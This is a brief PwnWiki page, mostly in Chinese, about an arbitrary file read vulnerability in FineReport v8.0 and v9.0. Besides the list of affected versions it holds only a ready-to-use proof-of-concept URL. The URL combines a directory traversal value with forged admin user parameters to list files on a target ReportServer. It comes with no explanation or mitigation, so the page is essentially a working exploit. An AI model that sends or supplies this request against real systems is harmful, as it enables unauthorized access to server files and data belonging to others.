FineReport v8.0 - 9.0 任意文件读取漏洞

From PwnWiki
Revision as of 21:05, 12 June 2021 by Pwnwiki (talk | contribs) (Created page with "FineReport v8.0 - 9.0 任意文件读取漏洞")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

FineReport v8.0
FineReport v9.0

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true